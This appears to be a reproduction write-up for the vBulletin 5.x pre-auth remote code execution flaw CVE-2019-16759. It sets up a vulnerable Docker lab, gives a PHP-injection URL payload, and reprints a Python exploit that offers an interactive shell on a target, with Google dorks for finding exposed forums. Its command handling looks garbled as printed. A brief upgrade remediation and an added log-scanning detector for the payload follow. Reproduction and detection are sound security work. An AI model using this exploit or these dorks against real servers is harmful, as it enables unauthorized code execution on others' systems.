vBulletin 5.x RCE (CVE-2019-16759) Reproduction

Environment setup

Install with Docker

docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808


docker exec -it e4fce6b1886c /bin/bash

# Update the package index, then install vim

apt-get update

apt install vim

# Edit the configuration

vim /etc/apache2/apache2.conf

# Append this setting at the bottom of the file

ServerName localhost:80

# Make run.sh in the root directory executable, then start it

chmod +x ./run.sh

./run.sh

 

Vulnerability reproduction

http://YOUR-IP/?routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit;

PoC reference: https://seclists.org/fulldisclosure/2019/Sep/31

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s " % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
    try:
        cmd = raw_input("vBulletin$")
        params["widgetConfig[code]"] = "echo shell_exec('cmd+'); exit;"
        r = requests.post(url = sys.argv[1], data = params)
        if r.status_code == 200:
            print r.text
        else:
            sys.exit("Exploit failed! :(")
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception, e:
        sys.exit(str(e))

Remediation

Upgrade to the latest version
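To check whether the request from the reproduction step has already reached a server, the following added example (not part of the original post or of vBulletin) scans access-log lines for the `routestring=ajax/render/widget_php` route combined with a `widgetConfig[code]` parameter. The function names, the log format (Apache common/combined) and the sample entries are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def is_widget_php_request(encoded_params: str) -> bool:
    """True when URL-encoded parameters (a query string or a form body)
    select the ajax/render/widget_php route and supply widgetConfig[code]."""
    route, has_code = "", False
    # parse_qsl percent-decodes, so %2F and %5B/%5D variants are normalised.
    for key, value in parse_qsl(encoded_params, keep_blank_values=True):
        key = key.strip().lower()
        if key == "routestring":
            route = value.strip().strip("/").lower()
        elif key == "widgetconfig[code]":
            has_code = True
    return route == "ajax/render/widget_php" and has_code

def scan_access_log(lines):
    """Return (line_number, client_ip, method) for every matching entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # malformed or non-HTTP entry
        query = urlsplit(match.group("target")).query
        if is_widget_php_request(query):
            hits.append((number, line.split(" ", 1)[0], match.group("method")))
    return hits

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2019:10:00:01 +0000] "GET /forum/ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Oct/2019:10:00:05 +0000] "GET /?routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit; HTTP/1.1" 200 90211',
    '198.51.100.7 - - [01/Oct/2019:10:00:09 +0000] "GET /?routestring=ajax/render/widget_php&widgetConfig%5Bcode%5D=PLACEHOLDER HTTP/1.1" 200 12',
    '203.0.113.4 - - [01/Oct/2019:10:01:00 +0000] "GET /?routestring=blogs HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("widget_php render request with code parameter:", hit)
```

The PoC script sends both parameters in a POST body, which a standard access log does not record; in that case apply `is_widget_php_request` to request bodies captured by a WAF or audit log.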
